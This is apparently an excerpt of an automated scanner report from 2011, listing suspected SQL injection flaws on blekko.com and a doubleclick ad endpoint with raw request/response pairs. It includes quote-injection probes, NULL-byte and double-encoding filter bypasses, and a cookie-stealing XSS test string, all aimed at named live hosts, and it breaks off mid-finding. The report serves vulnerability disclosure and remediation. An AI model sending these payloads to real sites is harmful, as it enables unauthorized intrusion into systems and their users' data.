The sessionid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sessionid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924%00'; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:26 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924%00''; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:26 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:26 GMT
Content-Length: 24116
X-Blekko-PT: b99ae2b84b5ff48883c9d27b96b0889c

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.8. http://blekko.com/ws/+/press-videos [suggestedSlashtagsList cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

The suggestedSlashtagsList cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the suggestedSlashtagsList cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the suggestedSlashtagsList cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%2527; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:25 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%2527%2527; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:25 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:25 GMT
Content-Length: 24137
X-Blekko-PT: 355cde925bffe3e60c7fb364a14fdbc7

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.9. http://blekko.com/ws/+/press-videos [t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

The t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621'; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:24 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621''; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:24 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:24 GMT
Content-Length: 24116
X-Blekko-PT: 5dce9899c2a36d366147f2bbf44adfd0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.10. http://blekko.com/ws/+/press-videos [v cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/press-videos

Issue detail

The v cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the v cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3%2527; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:23 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

Request 2

GET /ws/+/press-videos HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3%2527%2527; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:23 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:23 GMT
Content-Length: 24116
X-Blekko-PT: 26e1271c4a4322cb094bd1db889aad52

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...

1.11. http://blekko.com/ws/+/privacy [suggestedSlashtagsList cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/+/privacy

Issue detail

The suggestedSlashtagsList cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the suggestedSlashtagsList cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/+/privacy HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%00'; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:37:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:37:48 GMT
Cache-Control: private, max-age=86400
Expires: Thu, 03 Feb 2011 19:37:48 GMT
Content-Length: 29105
X-Blekko-PT: 26159a87074ec6fc43874b2d78f49cf0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
account. It is our policy
               to use Personally Identifiable Information to provide our technology and services, and not provide such to anyone outside of blekko without your consent (but see
               ...Exceptions to this Privacy Policy... below). </li>
...[SNIP]...
<li>to investigate, prevent or take action with regard to illegal activity, suspected fraud, potential threat to the physical safety of any individual, violations of the blekko
               Terms of Service, or as otherwise required by law;</li>
...[SNIP]...

Request 2

GET /ws/+/privacy HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1%00''; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:37:48 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.12. http://blekko.com/ws/xss+/date [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/xss+/date

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ws/xss+/date?1%00'=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:39:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:39:18 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 79337
X-Blekko-QF: chq
X-Blekko-PT: 6063d8d8eeb38be977e761d70635bc78

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
e configuration file world-readable. Delete /var/lib/mumble-server on purge opensc Protect against buffer overflow from rogue cards perl Fix header-parsing related security bugs. Update to Safe-2.25 postgresql-8.3 New upstream bugfix release spamassassin Update list of ARIN netblock delegations to avoid false positives in RelayEval splashy Modify lsb-base-logging.sh to avoid issues if splashy is removed but
...[SNIP]...

Request 2

GET /ws/xss+/date?1%00''=1 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:19 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.13. http://blekko.com/ws/xss+/date [suggestedSlashtagsList cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /ws/xss+/date

Issue detail

The suggestedSlashtagsList cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the suggestedSlashtagsList cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ws/xss+/date HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1'; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:39:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:39:15 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 79330
X-Blekko-QF: chq
X-Blekko-PT: 44f5cb25739892961c979aced5c70ef6

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
e configuration file world-readable. Delete /var/lib/mumble-server on purge opensc Protect against buffer overflow from rogue cards perl Fix header-parsing related security bugs. Update to Safe-2.25 postgresql-8.3 New upstream bugfix release spamassassin Update list of ARIN netblock delegations to avoid false positives in RelayEval splashy Modify lsb-base-logging.sh to avoid issues if splashy is removed but
...[SNIP]...

Request 2

GET /ws/xss+/date HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1''; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:39:16 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.14. http://blekko.com/ws/xss+/site=ha.ckers.org [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blekko.com
Path:   /ws/xss+/site=ha.ckers.org

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /ws/xss+'/site=ha.ckers.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:40:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: fbl=2; path=/; expires=Sat, 30 Jan 2021 19:40:06 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 73511
X-Blekko-QF: hq
X-Blekko-PT: 7773525d7e198d25f7140a30b928b6b6

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<p class="desc" id="snippet7">For those of you who are familiar with the RSA diminutive munitions project from ages ago, back when it was illegal to export certain crypto systems, and the diminutive PERL contests I&#39;ve enacted a similar contest to write a diminutive self replicating <strong>
...[SNIP]...

Request 2

GET /ws/xss+''/site=ha.ckers.org HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response 2

HTTP/1.1 509
Server: nginx
Date: Wed, 02 Feb 2011 19:40:07 GMT
Content-Type: text/html
Content-Length: 1357
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>bl
...[SNIP]...

1.15. http://googleads.g.doubleclick.net/pagead/ads [color_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The color_url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the color_url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500'&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 20:37:30 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 13020

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#105cb6;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<span>Fix Registry Error - Free</span>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500''&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 20:37:32 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12984

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#105cb6;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.16. http://googleads.g.doubleclick.net/pagead/ads [saldr parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The saldr parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the saldr parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4537085524273794&format=728x90_as&output=html&h=90&w=728&lmt=1296698959&channel=5128047824&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dtop%26rand%3D24449163&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677359026&shv=r20101117&jsv=r20110120&saldr=1'&prev_fmts=468x60_as%2C300x250_as&correlator=1296677358676&frm=0&adk=3538353238&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=3&dtd=43&xpc=pQKAErLDpJ&p=http%3A//boardreader.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://boardreader.com/domain/2mdn.net/x22?ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 20:40:18 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12964

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#105cb6;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
xcfyn7W6kDqWYQ&client=ca-pub-4537085524273794&adurl=http://app.insightgrit.com/Visit.php%3Fvt%3DO%26rid%3D84196991143186%26chid%3D320%26schid%3D320492%26c%3D84196%26kw%3Ddomain%2520name%2520system%2520error%26adid%3D5757498299%26cid%3D9496%26lsd%3DGoogle-Network%26_kk%3Ddomain%2520name%2520system%2520error%26_kt%3Df00942f2-b211-4990-ac15-86efd643f595" id=aw2 onclick="ha('aw2')" onfocus="ss('','aw2')" onm
...[SNIP]...

Request 2

